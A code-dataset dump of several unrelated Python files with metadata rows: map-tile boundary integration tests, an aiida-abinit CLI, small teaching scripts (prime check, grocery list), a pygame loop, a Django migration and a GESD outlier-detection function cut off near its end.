    # Natural Earth boundary min_zoom assignment, derived from scalerank:
    #   scalerank 0 -> 6.7, <=2 -> 2, <=3 -> 3, <=4 -> 5, <=5 -> 5.5,
    #   <=6 -> 6, <=7 -> 6.7, <=8 -> 6.8, <=9 -> 7
    # NE 1:50m (zooms 0-4) only carries USA, Canada, Brazil and Australia,
    # all at scalerank 2 (a documented NE omission). NE 1:10m is used at
    # zooms 5-7 and covers most countries, so e.g. Russia only "pops" in
    # at z5 despite carrying a min_zoom of 2 (likewise India, China,
    # Indonesia and South Africa).

    def test_england_wales_boundary(self):
        """England-Wales map_unit boundary (scalerank=4, 1:10m NE only)."""
        self.load_fixtures([
            'file://integration-test/fixtures/'
            'ne_10m_admin_0_boundary_lines_map_units/'
            '992-ne_10m_admin_0_boundary_lines_map_units_eng_wales.shp',
        ])
        self.assert_has_feature(
            5, 15, 10, 'boundaries',
            {'kind': 'map_unit', 'min_zoom': 5, 'sort_rank': 258})

    def test_usa_region(self):
        """USA region boundary (scalerank=2, in both 1:50m and 1:10m NE)."""
        self.load_fixtures([
            'file://integration-test/fixtures/'
            'ne_10m_admin_1_states_provinces_lines/'
            '992-ne_10m_admin_1_states_provinces_lines-nv-ca-'
            'europe-mexico.shp',
        ])
        # min_zoom comes through from scalerank, but NE region features
        # should carry no name.
        self.assert_has_feature(
            2, 0, 1, 'boundaries',
            {'kind': 'region', 'min_zoom': 2})
        self.assert_has_feature(
            2, 0, 1, 'boundaries',
            {'kind': 'region', 'name': type(None)})

    def test_10m_regions(self):
        """Region boundaries from 1:10m NE across a range of scaleranks."""
        self.load_fixtures([
            'file://integration-test/fixtures/'
            'ne_10m_admin_1_states_provinces_lines/'
            '992-ne_10m_admin_1_states_provinces_lines-nv-ca'
            '-europe-mexico.shp',
        ])
        # (zoom, x, y, expected properties), in the original assertion order.
        expectations = [
            # Germany (scalerank=3): min_zoom only, no NE name.
            (5, 17, 10, {'kind': 'region', 'min_zoom': 3}),
            (5, 17, 10, {'kind': 'region', 'name': type(None)}),
            # Mexico (scalerank=4): no NE name.
            (5, 7, 14, {'kind': 'region', 'min_zoom': 5}),
            (5, 7, 14, {'kind': 'region', 'name': type(None)}),
            # Poland (scalerank=5): no NE name.
            (5, 17, 10, {'kind': 'region', 'min_zoom': 5.5}),
            (5, 17, 10, {'kind': 'region', 'name': type(None)}),
            # Austria (scalerank=6): unnamed at z6, named at z7.
            (6, 34, 22, {'kind': 'region', 'min_zoom': 6}),
            (6, 34, 22, {'kind': 'region', 'name': type(None)}),
            (7, 68, 44, {'kind': 'region', 'name': 'Tirol - Salzburg'}),
            # Sweden (scalerank=7).
            (6, 35, 18, {'kind': 'region', 'min_zoom': 6.7}),
            # United Kingdom (scalerank=8).
            (6, 31, 18, {'kind': 'region', 'min_zoom': 6.8}),
            # Switzerland (scalerank=9).
            (7, 66, 44, {'kind': 'region', 'min_zoom': 7}),
        ]
        for zoom, x, y, props in expectations:
            self.assert_has_feature(zoom, x, y, 'boundaries', props)
class BoundariesMinZoomAndNameOsm(FixtureTest):
    """Region boundary names sourced from OpenStreetMap relations."""

    def test_region_boundary_zug_luzern_z8(self):
        """At z8 the short Zug-Luzern boundary has its name stripped."""
        fixtures = [
            'http://www.openstreetmap.org/relation/1686447',
            'http://www.openstreetmap.org/relation/1685677',
        ]
        self.load_fixtures(fixtures, clip=self.tile_bbox(8, 133, 89))
        # The regional boundary itself is present at zoom 8, but it is
        # very short, so its name should have been stripped off.
        self.assert_has_feature(
            8, 133, 89, 'boundaries',
            {'kind': 'region', 'name': type(None)})

    def test_region_boundary_zug_luzern_z12(self):
        """At z12 there is enough space to label the Zug-Luzern boundary."""
        # The boundary between Zug and Luzern is quite short, so go to z12
        # where there is room for a label.
        fixtures = [
            'http://www.openstreetmap.org/relation/1686447',
            'http://www.openstreetmap.org/relation/1685677',
        ]
        self.load_fixtures(fixtures, clip=self.tile_bbox(12, 2144, 1438))
        self.assert_has_feature(
            12, 2144, 1438, 'boundaries',
            {'kind': 'region', 'name': 'Zug - Luzern'})

    def test_region_boundary_salzburg_tirol(self):
        """The Salzburg-Tirol boundary is long enough to label at z8."""
        fixtures = [
            'http://www.openstreetmap.org/relation/52343',
            'http://www.openstreetmap.org/relation/86539',
        ]
        self.load_fixtures(fixtures, clip=self.tile_bbox(8, 136, 89))
        self.assert_has_feature(
            8, 136, 89, 'boundaries',
            {'kind': 'region', 'name': 'Salzburg - Tirol'})
| 37.89697 | 75 | 0.565009 | from . import FixtureTest
class BoundariesMinZoomAndNameNe(FixtureTest):
'min_zoom': 5, 'sort_rank': 258})
def test_usa_region(self):
self.load_fixtures([
'file://integration-test/fixtures/'
'ne_10m_admin_1_states_provinces_lines/'
'992-ne_10m_admin_1_states_provinces_lines-nv-ca-'
'europe-mexico.shp',
])
self.assert_has_feature(
2, 0, 1, 'boundaries',
{'kind': 'region', 'min_zoom': 2})
self.assert_has_feature(
2, 0, 1, 'boundaries',
{'kind': 'region', 'name': type(None)})
def test_10m_regions(self):
self.load_fixtures([
'file://integration-test/fixtures/'
'ne_10m_admin_1_states_provinces_lines/'
'992-ne_10m_admin_1_states_provinces_lines-nv-ca'
'-europe-mexico.shp',
])
self.assert_has_feature(
5, 17, 10, 'boundaries',
{'kind': 'region', 'min_zoom': 3})
self.assert_has_feature(
5, 17, 10, 'boundaries',
{'kind': 'region', 'name': type(None)})
self.assert_has_feature(
5, 7, 14, 'boundaries',
{'kind': 'region', 'min_zoom': 5})
self.assert_has_feature(
5, 7, 14, 'boundaries',
{'kind': 'region', 'name': type(None)})
self.assert_has_feature(
5, 17, 10, 'boundaries',
{'kind': 'region', 'min_zoom': 5.5})
self.assert_has_feature(
5, 17, 10, 'boundaries',
{'kind': 'region', 'name': type(None)})
self.assert_has_feature(
6, 34, 22, 'boundaries',
{'kind': 'region', 'min_zoom': 6})
self.assert_has_feature(
6, 34, 22, 'boundaries',
{'kind': 'region', 'name': type(None)})
self.assert_has_feature(
7, 68, 44, 'boundaries',
{'kind': 'region', 'name': 'Tirol - Salzburg'})
self.assert_has_feature(
6, 35, 18, 'boundaries',
{'kind': 'region', 'min_zoom': 6.7})
self.assert_has_feature(
6, 31, 18, 'boundaries',
{'kind': 'region', 'min_zoom': 6.8})
self.assert_has_feature(
7, 66, 44, 'boundaries',
{'kind': 'region', 'min_zoom': 7})
class BoundariesMinZoomAndNameOsm(FixtureTest):
def test_region_boundary_zug_luzern_z8(self):
self.load_fixtures([
'http://www.openstreetmap.org/relation/1686447',
'http://www.openstreetmap.org/relation/1685677',
], clip=self.tile_bbox(8, 133, 89))
self.assert_has_feature(
8, 133, 89, 'boundaries',
{'kind': 'region', 'name': type(None)})
def test_region_boundary_zug_luzern_z12(self):
# Switzerland region HAS name, OpenStreetMap
# do this at z12, as the boundary between Zug and Luzern is quite
# short, and we want enough space to label.
self.load_fixtures([
'http://www.openstreetmap.org/relation/1686447',
'http://www.openstreetmap.org/relation/1685677',
], clip=self.tile_bbox(12, 2144, 1438))
# name should be present at zoom 12
self.assert_has_feature(
12, 2144, 1438, 'boundaries',
{'kind': 'region', 'name': 'Zug - Luzern'})
def test_region_boundary_salzburg_tirol(self):
# Austria region HAS name, OpenStreetMap
self.load_fixtures([
'http://www.openstreetmap.org/relation/52343',
'http://www.openstreetmap.org/relation/86539',
], clip=self.tile_bbox(8, 136, 89))
self.assert_has_feature(
8, 136, 89, 'boundaries',
{'kind': 'region', 'name': 'Salzburg - Tirol'})
| true | true |
f7326f9a88e0ca06be5f06f02185b9b5198aa58c | 1,631 | py | Python | aiida_abinit/cli.py | gpetretto/aiida-abinit | bdbfd770eecb44a0b864bdee1d282eab92f7913d | [
"MIT"
] | null | null | null | aiida_abinit/cli.py | gpetretto/aiida-abinit | bdbfd770eecb44a0b864bdee1d282eab92f7913d | [
"MIT"
] | null | null | null | aiida_abinit/cli.py | gpetretto/aiida-abinit | bdbfd770eecb44a0b864bdee1d282eab92f7913d | [
"MIT"
] | null | null | null | """
Command line interface (cli) for aiida_abinit.
Register new commands either via the "console_scripts" entry point or plug them
directly into the 'verdi' command by using AiiDA-specific entry points like
"aiida.cmdline.data" (both in the setup.json file).
"""
import sys
import click
from aiida.cmdline.utils import decorators
from aiida.cmdline.commands.cmd_data import verdi_data
from aiida.cmdline.params.types import DataParamType
# See the aiida.cmdline.data entry point in setup.json: this registers the
# group below as ``verdi data abinit``.
@verdi_data.group('abinit')
def data_cli():
    """Top-level ``verdi data abinit`` command group for aiida-abinit."""
@data_cli.command('list')
@decorators.with_dbenv()
def list_():  # pylint: disable=redefined-builtin
    """List all nodes of the 'abinit' data type, one per line.

    Each line shows the node's string representation and its pk.
    """
    # Imported lazily so the CLI help works without a loaded database profile.
    from aiida.orm import QueryBuilder
    from aiida.plugins import DataFactory

    AbinitData = DataFactory('abinit')

    qb = QueryBuilder()
    qb.append(AbinitData)

    # Each QueryBuilder row is a one-element list holding the matched node.
    lines = ['{}, pk: {}\n'.format(str(node), node.pk) for (node,) in qb.all()]
    sys.stdout.write(''.join(lines))
@data_cli.command('export')
@click.argument('node', metavar='IDENTIFIER', type=DataParamType())
@click.option('--outfile',
              '-o',
              type=click.Path(dir_okay=False),
              help='Write output to file (default: print to stdout).')
@decorators.with_dbenv()
def export(node, outfile):
    """Export a node (identified by PK, UUID or label) to plain text."""
    string = str(node)
    if outfile:
        # Explicit encoding so the output does not depend on the locale.
        with open(outfile, 'w', encoding='utf-8') as handle:
            handle.write(string)
    else:
        click.echo(string)
| 27.644068 | 87 | 0.676885 |
import sys
import click
from aiida.cmdline.utils import decorators
from aiida.cmdline.commands.cmd_data import verdi_data
from aiida.cmdline.params.types import DataParamType
@verdi_data.group('abinit')
def data_cli():
@data_cli.command('list')
@decorators.with_dbenv()
def list_():
from aiida.orm import QueryBuilder
from aiida.plugins import DataFactory
DiffParameters = DataFactory('abinit')
qb = QueryBuilder()
qb.append(DiffParameters)
results = qb.all()
s = ""
for result in results:
obj = result[0]
s += "{}, pk: {}\n".format(str(obj), obj.pk)
sys.stdout.write(s)
@data_cli.command('export')
@click.argument('node', metavar='IDENTIFIER', type=DataParamType())
@click.option('--outfile',
'-o',
type=click.Path(dir_okay=False),
help='Write output to file (default: print to stdout).')
@decorators.with_dbenv()
def export(node, outfile):
string = str(node)
if outfile:
with open(outfile, 'w') as f:
f.write(string)
else:
click.echo(string)
| true | true |
f73270246396d797d875be406506d2f9147d1917 | 390 | py | Python | src/CursoEmvideo/ex052.py | kessiarodrigues/Python-Course | 2e6097af4475d826c2b242d4699aec72301060f7 | [
"MIT"
] | null | null | null | src/CursoEmvideo/ex052.py | kessiarodrigues/Python-Course | 2e6097af4475d826c2b242d4699aec72301060f7 | [
"MIT"
] | null | null | null | src/CursoEmvideo/ex052.py | kessiarodrigues/Python-Course | 2e6097af4475d826c2b242d4699aec72301060f7 | [
"MIT"
] | null | null | null | num = int(input('Digite um número: '))
def divisores(num):
    """Return the sorted list of divisors of *num* in the range 1..num."""
    return [c for c in range(1, num + 1) if num % c == 0]


def main():
    """Read an integer and report, with ANSI colours, whether it is prime."""
    num = int(input('Digite um número: '))
    divs = divisores(num)
    for c in range(1, num + 1):
        # Divisors print in yellow, non-divisors in red.
        print('\33[33m' if num % c == 0 else '\33[31m', end='')
        print('{} '.format(c), end='')
    tot = len(divs)
    print('\n\033[mO número {} foi divisível {} vezes'.format(num, tot))
    # A prime number has exactly two divisors: 1 and itself.
    if tot == 2:
        print('E por isso ele É PRIMO!')
    else:
        print('E por isso ele NÃO É PRIMO!')  # typo fix: "isoo" -> "isso"


if __name__ == '__main__':
    main()
| 26 | 68 | 0.523077 | num = int(input('Digite um número: '))
tot = 0
for c in range(1, num + 1):
if num % c == 0:
print('\33[33m', end='')
tot += 1
else:
print('\33[31m', end='')
print('{} '.format(c), end='')
print('\n\033[mO número {} foi divisível {} vezes'.format(num, tot))
if tot == 2:
print('E por isso ele É PRIMO!')
else:
print('E por isoo ele NÃO É PRIMO!')
| true | true |
f732708b48f8553877cd926c4f63a2d192d32cb7 | 5,209 | py | Python | groceries.py | ktg269/groceries-home | 338c40c6b7ad513bb8dd2a07d14133e7bac3427d | [
"MIT"
] | 1 | 2019-06-11T03:06:38.000Z | 2019-06-11T03:06:38.000Z | groceries.py | ktg269/groceries-home | 338c40c6b7ad513bb8dd2a07d14133e7bac3427d | [
"MIT"
] | null | null | null | groceries.py | ktg269/groceries-home | 338c40c6b7ad513bb8dd2a07d14133e7bac3427d | [
"MIT"
] | null | null | null | # groceries.py
products = [
    {"id": 1, "name": "Chocolate Sandwich Cookies", "department": "snacks", "aisle": "cookies cakes", "price": 3.50},
    {"id": 2, "name": "All-Seasons Salt", "department": "pantry", "aisle": "spices seasonings", "price": 4.99},
    {"id": 3, "name": "Robust Golden Unsweetened Oolong Tea", "department": "beverages", "aisle": "tea", "price": 2.49},
    {"id": 4, "name": "Smart Ones Classic Favorites Mini Rigatoni With Vodka Cream Sauce", "department": "frozen", "aisle": "frozen meals", "price": 6.99},
    {"id": 5, "name": "Green Chile Anytime Sauce", "department": "pantry", "aisle": "marinades meat preparation", "price": 7.99},
    {"id": 6, "name": "Dry Nose Oil", "department": "personal care", "aisle": "cold flu allergy", "price": 21.99},
    {"id": 7, "name": "Pure Coconut Water With Orange", "department": "beverages", "aisle": "juice nectars", "price": 3.50},
    {"id": 8, "name": "Cut Russet Potatoes Steam N' Mash", "department": "frozen", "aisle": "frozen produce", "price": 4.25},
    {"id": 9, "name": "Light Strawberry Blueberry Yogurt", "department": "dairy eggs", "aisle": "yogurt", "price": 6.50},
    {"id": 10, "name": "Sparkling Orange Juice & Prickly Pear Beverage", "department": "beverages", "aisle": "water seltzer sparkling water", "price": 2.99},
    {"id": 11, "name": "Peach Mango Juice", "department": "beverages", "aisle": "refrigerated", "price": 1.99},
    {"id": 12, "name": "Chocolate Fudge Layer Cake", "department": "frozen", "aisle": "frozen dessert", "price": 18.50},
    {"id": 13, "name": "Saline Nasal Mist", "department": "personal care", "aisle": "cold flu allergy", "price": 16.00},
    {"id": 14, "name": "Fresh Scent Dishwasher Cleaner", "department": "household", "aisle": "dish detergents", "price": 4.99},
    {"id": 15, "name": "Overnight Diapers Size 6", "department": "babies", "aisle": "diapers wipes", "price": 25.50},
    {"id": 16, "name": "Mint Chocolate Flavored Syrup", "department": "snacks", "aisle": "ice cream toppings", "price": 4.50},
    {"id": 17, "name": "Rendered Duck Fat", "department": "meat seafood", "aisle": "poultry counter", "price": 9.99},
    {"id": 18, "name": "Pizza for One Suprema Frozen Pizza", "department": "frozen", "aisle": "frozen pizza", "price": 12.50},
    {"id": 19, "name": "Gluten Free Quinoa Three Cheese & Mushroom Blend", "department": "dry goods pasta", "aisle": "grains rice dried goods", "price": 3.99},
    {"id": 20, "name": "Pomegranate Cranberry & Aloe Vera Enrich Drink", "department": "beverages", "aisle": "juice nectars", "price": 4.25}
]  # based on data from Instacart: https://www.instacart.com/datasets/grocery-shopping-2017


def sort_by_name(any_product):
    """Sort key: the product's display name."""
    return any_product["name"]


def print_products(product_list):
    """Print a count header, then every product alphabetically with its price.

    Output looks like:
        THERE ARE 20 PRODUCTS:
        ...All-Seasons Salt ($4.99)
    """
    print("----------------------")
    print("THERE ARE " + str(len(product_list)) + " PRODUCTS:")
    print("----------------------")
    for p in sorted(product_list, key=sort_by_name):
        price_usd = " (${0:.2f})".format(p["price"])
        print("..." + p["name"] + price_usd)


def print_departments(product_list):
    """Print a count header, then each department with its product tally.

    Output looks like:
        THERE ARE 10 DEPARTMENTS:
         + Babies (1 product)
         + Beverages (5 products)
    """
    departments = [p["department"] for p in product_list]
    unique_departments = sorted(set(departments))
    print("--------------")
    print("THERE ARE " + str(len(unique_departments)) + " DEPARTMENTS:")
    print("--------------")
    for d in unique_departments:
        matching_products_count = departments.count(d)
        # Singular/plural label for the tally.
        label = "products" if matching_products_count > 1 else "product"
        print(" + " + d.title() + " (" + str(matching_products_count) + " " + label + ")")


if __name__ == "__main__":
    # Guarded so the module can be imported without printing anything;
    # running it as a script produces the same output as before.
    print_products(products)
    print_departments(products)
| 41.672 | 158 | 0.623344 |
products = [
{"id":1, "name": "Chocolate Sandwich Cookies", "department": "snacks", "aisle": "cookies cakes", "price": 3.50},
{"id":2, "name": "All-Seasons Salt", "department": "pantry", "aisle": "spices seasonings", "price": 4.99},
{"id":3, "name": "Robust Golden Unsweetened Oolong Tea", "department": "beverages", "aisle": "tea", "price": 2.49},
{"id":4, "name": "Smart Ones Classic Favorites Mini Rigatoni With Vodka Cream Sauce", "department": "frozen", "aisle": "frozen meals", "price": 6.99},
{"id":5, "name": "Green Chile Anytime Sauce", "department": "pantry", "aisle": "marinades meat preparation", "price": 7.99},
{"id":6, "name": "Dry Nose Oil", "department": "personal care", "aisle": "cold flu allergy", "price": 21.99},
{"id":7, "name": "Pure Coconut Water With Orange", "department": "beverages", "aisle": "juice nectars", "price": 3.50},
{"id":8, "name": "Cut Russet Potatoes Steam N' Mash", "department": "frozen", "aisle": "frozen produce", "price": 4.25},
{"id":9, "name": "Light Strawberry Blueberry Yogurt", "department": "dairy eggs", "aisle": "yogurt", "price": 6.50},
{"id":10, "name": "Sparkling Orange Juice & Prickly Pear Beverage", "department": "beverages", "aisle": "water seltzer sparkling water", "price": 2.99},
{"id":11, "name": "Peach Mango Juice", "department": "beverages", "aisle": "refrigerated", "price": 1.99},
{"id":12, "name": "Chocolate Fudge Layer Cake", "department": "frozen", "aisle": "frozen dessert", "price": 18.50},
{"id":13, "name": "Saline Nasal Mist", "department": "personal care", "aisle": "cold flu allergy", "price": 16.00},
{"id":14, "name": "Fresh Scent Dishwasher Cleaner", "department": "household", "aisle": "dish detergents", "price": 4.99},
{"id":15, "name": "Overnight Diapers Size 6", "department": "babies", "aisle": "diapers wipes", "price": 25.50},
{"id":16, "name": "Mint Chocolate Flavored Syrup", "department": "snacks", "aisle": "ice cream toppings", "price": 4.50},
{"id":17, "name": "Rendered Duck Fat", "department": "meat seafood", "aisle": "poultry counter", "price": 9.99},
{"id":18, "name": "Pizza for One Suprema Frozen Pizza", "department": "frozen", "aisle": "frozen pizza", "price": 12.50},
{"id":19, "name": "Gluten Free Quinoa Three Cheese & Mushroom Blend", "department": "dry goods pasta", "aisle": "grains rice dried goods", "price": 3.99},
{"id":20, "name": "Pomegranate Cranberry & Aloe Vera Enrich Drink", "department": "beverages", "aisle": "juice nectars", "price": 4.25}
] # based on data from Instacart: https://www.instacart.com/datasets/grocery-shopping-2017
# product part 1
# --------------
# THERE ARE 20 PRODUCTS:
# --------------
# + All-Seasons Salt ($4.99)
# + Chocolate Fudge Layer Cake ($18.50)
# + Chocolate Sandwich Cookies ($3.50)
# + Cut Russet Potatoes Steam N' Mash ($4.25)
products_count = len(products)
print("----------------------")
print("THERE ARE " + str(products_count) + " PRODUCTS:")
print("----------------------")
def sort_by_name(any_product):
return any_product["name"]
sorted_products = sorted(products, key=sort_by_name)
for p in sorted_products:
price_usd = " (${0:.2f})".format(p["price"])
print("..." + p["name"] + price_usd)
departments = []
for p in products:
departments.append(p["department"])
unique_departments = list(set(departments))
department_count = len(unique_departments)
print("--------------")
print("THERE ARE " + str(department_count) + " DEPARTMENTS:")
print("--------------")
unique_departments.sort()
for d in unique_departments:
matching_products = [p for p in products if p["department"] ==d]
matching_products_count = len(matching_products)
if matching_products_count >1:
label = "products"
else:
label = "product"
print(" + " + d.title() + " (" + str(matching_products_count) + " " + label + ")")
| true | true |
f73270dce64166830a82286e79f9f4a512fe8e73 | 889 | py | Python | gamelib/main.py | trascen/u2665 | 95eef1e225a8618eab7c1c5d839329b9df31dc9e | [
"Unlicense"
] | 2 | 2017-10-16T15:27:42.000Z | 2017-10-17T17:13:29.000Z | gamelib/main.py | trascen/u2665 | 95eef1e225a8618eab7c1c5d839329b9df31dc9e | [
"Unlicense"
] | null | null | null | gamelib/main.py | trascen/u2665 | 95eef1e225a8618eab7c1c5d839329b9df31dc9e | [
"Unlicense"
] | null | null | null | '''Game main module.
Contains the entry point used by the run_game.py script.
Feel free to put all your game code here, or in other modules in this "gamelib"
package.
'''
import pygame
import pygame.display
import pygame.surface
import pygame.event
import pygame.image
import pygame.transform
from gamelib.scene import MainScene
from gamelib.sprite import Spritey
def main():
    """Entry point of the game: set up pygame and run the scene loop at 60 FPS."""
    pygame.init()
    real_screen = pygame.display.set_mode([640 * 2, 480 * 2])
    clock = pygame.time.Clock()
    scene = MainScene()
    while scene:
        scene = scene.update()
        for event in pygame.event.get():
            # Quit on the 'q' key or the window close button. Parenthesised
            # for clarity; the original relied on 'and' binding tighter
            # than 'or'.
            if (event.type == pygame.KEYDOWN and event.key == pygame.K_q) \
                    or event.type == pygame.QUIT:
                scene = None
        if scene:
            scene.draw(real_screen)
            pygame.display.flip()
        clock.tick(60)
    # Release pygame resources (window, display) once the loop exits.
    pygame.quit()
import pygame
import pygame.display
import pygame.surface
import pygame.event
import pygame.image
import pygame.transform
from gamelib.scene import MainScene
from gamelib.sprite import Spritey
def main():
pygame.init()
real_screen = pygame.display.set_mode([640*2, 480*2])
clock = pygame.time.Clock()
scene = MainScene()
while scene:
scene = scene.update()
for event in pygame.event.get():
if event.type == pygame.KEYDOWN and event.key == pygame.K_q or event.type == pygame.QUIT:
scene = None
if scene:
scene.draw(real_screen)
pygame.display.flip()
clock.tick(60) | true | true |
f7327108494348874c7a463c5e8d80166a93299e | 1,203 | py | Python | manager/director/apps/users/migrations/0004_massemail.py | darius-kia/director4 | 1d2c2c4c3ec12cc9b7f846d5dc075ea3bbef36f9 | [
"MIT"
] | 7 | 2020-08-23T23:08:34.000Z | 2021-12-02T04:17:37.000Z | manager/director/apps/users/migrations/0004_massemail.py | darius-kia/director4 | 1d2c2c4c3ec12cc9b7f846d5dc075ea3bbef36f9 | [
"MIT"
] | 43 | 2020-08-24T16:48:29.000Z | 2022-03-02T19:45:54.000Z | manager/director/apps/users/migrations/0004_massemail.py | darius-kia/director4 | 1d2c2c4c3ec12cc9b7f846d5dc075ea3bbef36f9 | [
"MIT"
] | 10 | 2020-08-17T20:42:52.000Z | 2021-07-16T03:46:51.000Z | # Generated by Django 2.2.12 on 2020-04-07 14:15
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Create the MassEmail model (auto-generated by Django makemigrations)."""

    dependencies = [
        ('users', '0003_user_accepted_guidelines'),
    ]

    operations = [
        migrations.CreateModel(
            name='MassEmail',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('subject', models.CharField(max_length=200)),
                # Both HTML and plain-text bodies are stored.
                ('text_html', models.TextField()),
                ('text_plain', models.TextField()),
                ('created_time', models.DateTimeField(auto_now_add=True)),
                # Null until the email is actually sent.
                ('sent_time', models.DateTimeField(default=None, null=True)),
                ('limit_users', models.ManyToManyField(help_text='If this is empty, the email will be sent to ALL users!', related_name='_massemail_limit_users_+', to=settings.AUTH_USER_MODEL)),
                # SET_NULL so deleting a user preserves the emails they sent.
                ('sender', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='sent_emails', to=settings.AUTH_USER_MODEL)),
            ],
        ),
    ]
| 41.482759 | 194 | 0.637573 |
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('users', '0003_user_accepted_guidelines'),
]
operations = [
migrations.CreateModel(
name='MassEmail',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('subject', models.CharField(max_length=200)),
('text_html', models.TextField()),
('text_plain', models.TextField()),
('created_time', models.DateTimeField(auto_now_add=True)),
('sent_time', models.DateTimeField(default=None, null=True)),
('limit_users', models.ManyToManyField(help_text='If this is empty, the email will be sent to ALL users!', related_name='_massemail_limit_users_+', to=settings.AUTH_USER_MODEL)),
('sender', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='sent_emails', to=settings.AUTH_USER_MODEL)),
],
),
]
| true | true |
f732712de1cc15b3e1d91ae8e6631e12c2ea6874 | 6,412 | py | Python | src/signal_processing_algorithms/gesd.py | dbradf/signal-processing-algorithms | 75312e873543f0f89aace75f43ded783395425c5 | [
"Apache-2.0"
] | 19 | 2020-04-13T11:26:50.000Z | 2022-03-28T12:43:04.000Z | src/signal_processing_algorithms/gesd.py | dbradf/signal-processing-algorithms | 75312e873543f0f89aace75f43ded783395425c5 | [
"Apache-2.0"
] | 11 | 2020-03-17T19:20:21.000Z | 2022-01-27T22:27:25.000Z | src/signal_processing_algorithms/gesd.py | dbradf/signal-processing-algorithms | 75312e873543f0f89aace75f43ded783395425c5 | [
"Apache-2.0"
] | 5 | 2020-05-13T16:53:40.000Z | 2022-01-26T23:11:45.000Z | # -*- coding: utf-8 -*-
"""
GESD based Detect outliers.
Generalized ESD Test for Outliers
see 'GESD<https://www.itl.nist.gov/div898/handbook/eda/section3/eda35h3.htm>'
"""
import collections
from typing import List
import numpy as np
import numpy.ma as ma
import structlog
from scipy.stats import t
LOG = structlog.get_logger()
GesdResult = collections.namedtuple(
"GesdResult",
["count", "suspicious_indexes", "test_statistics", "critical_values", "all_z_scores"],
)
"""
A named tuple for the results of the GESD algorithm.
The outliers are in suspicious_indexes[count:].
The low confidence outliers are in suspicious_indexes[:count].
:type count: int,
:type suspicious_indexes: list(int)
:type test_statistics: list(float)
:type critical_values: list(float)
:type all_z_scores: list(float, float)
:type series: list(float)
"""
def gesd(
    data: List[float], max_outliers: int = 10, significance_level: float = 0.05, mad: bool = False
) -> GesdResult:
    """
    Perform a Generalized ESD Test for Outliers.

    The generalized ESD (Extreme Studentized Deviate) test (Rosner 1983) is used to detect one
    or more outliers in a univariate data set that follows an approximately normal distribution.

    Usage:

        gesd_result = gesd(
            series,
            max_outliers,
            significance_level=significance,
            mad=True)
        count = gesd_result.count
        indexes = gesd_result.suspicious_indexes
        print("outliers indexes {}".format(indexes[:count]))
        print("low confidence outliers indexes {}".format(indexes[count:]))

    If the standard deviation (or the MAD-based sigma estimate) of the remaining series is zero
    the iteration stops early. For plain sigma this means a constant (sub-)series, so the
    behaviour makes sense; for MAD it may also mean that a majority of the values equal the
    median — validate the data to avoid that case.

    Note: the test_statistics array is signed, which allows determining whether an outlier lies
    above or below the center.

    :param data: The data to test.
    :param max_outliers: Test for up to this many outliers.
    :param significance_level: Significance level of the test (0 < alpha < 1).
    :param mad: Use Median Absolute Deviation instead of mean / standard deviation.
    :return: GesdResult(count, suspicious_indexes, test_statistics, critical_values,
        z scores at the suspicious indexes).
    :raises ValueError: on empty data or invalid max_outliers / significance_level.
    see 'here<https://www.itl.nist.gov/div898/handbook/eda/section3/eda35h3.htm>'
    """
    if data is None or np.size(data) == 0:
        raise ValueError("No Data ({})".format(data))
    length = len(data)
    if max_outliers < 1:
        raise ValueError(
            "max_outliers({max_outliers}) must be >= 1".format(max_outliers=max_outliers)
        )
    if max_outliers >= length:
        raise ValueError(
            "max_outliers({max_outliers}) <= length({length})".format(
                length=length, max_outliers=max_outliers
            )
        )
    if significance_level <= 0.0 or significance_level >= 1.0:
        raise ValueError(
            "invalid significance_level({significance_level})".format(
                significance_level=significance_level
            )
        )

    series = ma.array(data)

    test_statistics = []
    critical_values = []
    potential_outlier_indices = []
    # Defensive default: stays empty if sigma == 0 on the very first iteration,
    # in which case no candidates are recorded either.
    all_z_scores = ma.array([])

    # max_outliers must be strictly less than length: the standard deviation
    # (and MAD) of a single-entry series is 0, so the z score would be NaN.
    m_outliers = min(max_outliers, length - 1)
    for i in range(m_outliers):
        LOG.debug("iteration", i=i, mad=mad, series=series)
        if mad:
            # Robust sigma estimate: .75 quantile scaling of the MAD.
            # Note: 1.4826 == 1 / Q(.75) == 1 / 0.675.
            center = np.ma.median(series)
            sigma = 1.4826 * np.ma.median(np.fabs(series - center))
        else:
            center = series.mean()
            sigma = series.std(ddof=1)

        if sigma == 0:
            break
        z_scores = (series - center) / sigma
        if i == 0:
            # Keep the z scores of the full, unmasked series for the result.
            all_z_scores = z_scores

        LOG.debug("calculate", z_scores=np.array([np.arange(length, dtype=int), z_scores]).T)

        max_z_score_index = np.fabs(z_scores).argmax()
        max_z_score = z_scores[max_z_score_index]

        # Two-sided test for significance.
        significance_result = 1.0 - significance_level / (2.0 * (length - i))

        # Percent point function with df (degrees of freedom).
        percentage_point = t.ppf(significance_result, df=length - i - 2)
        value = (
            (length - i - 1)
            * percentage_point
            / np.sqrt((length - i - 2 + percentage_point ** 2) * (length - i))
        )

        # Update results.
        potential_outlier_indices.append(max_z_score_index)
        test_statistics.append(max_z_score)
        critical_values.append(value)

        # BUGFIX: index with len(test_statistics), not max_outliers. The
        # per-iteration lists are shorter than max_outliers, and building a
        # ragged np.array raises ValueError on NumPy >= 1.24 (previously a
        # deprecation warning), which crashed this debug log mid-iteration.
        LOG.debug(
            "iteration complete",
            z_scores=np.array(
                [
                    np.arange(len(test_statistics), dtype=int),
                    test_statistics,
                    critical_values,
                    np.greater(test_statistics, critical_values),
                ]
            ).T,
        )
        # Mask the selected value so it is excluded from the next iteration.
        series[max_z_score_index] = ma.masked

    LOG.debug("values calculated", max_z_scores=test_statistics, lambda_values=critical_values)

    # Walk backwards from the largest candidate count; the first candidate
    # whose |test statistic| exceeds its critical value fixes the outlier
    # count. (Looping over an empty candidate list simply falls through.)
    for number_outliers in range(len(potential_outlier_indices), 0, -1):
        if np.abs(test_statistics[number_outliers - 1]) > critical_values[number_outliers - 1]:
            LOG.debug(
                "outliers discovered",
                number_outliers=number_outliers,
                outliers=potential_outlier_indices[0:number_outliers],
            )
            return GesdResult(
                number_outliers,
                potential_outlier_indices,
                test_statistics,
                critical_values,
                all_z_scores[potential_outlier_indices],
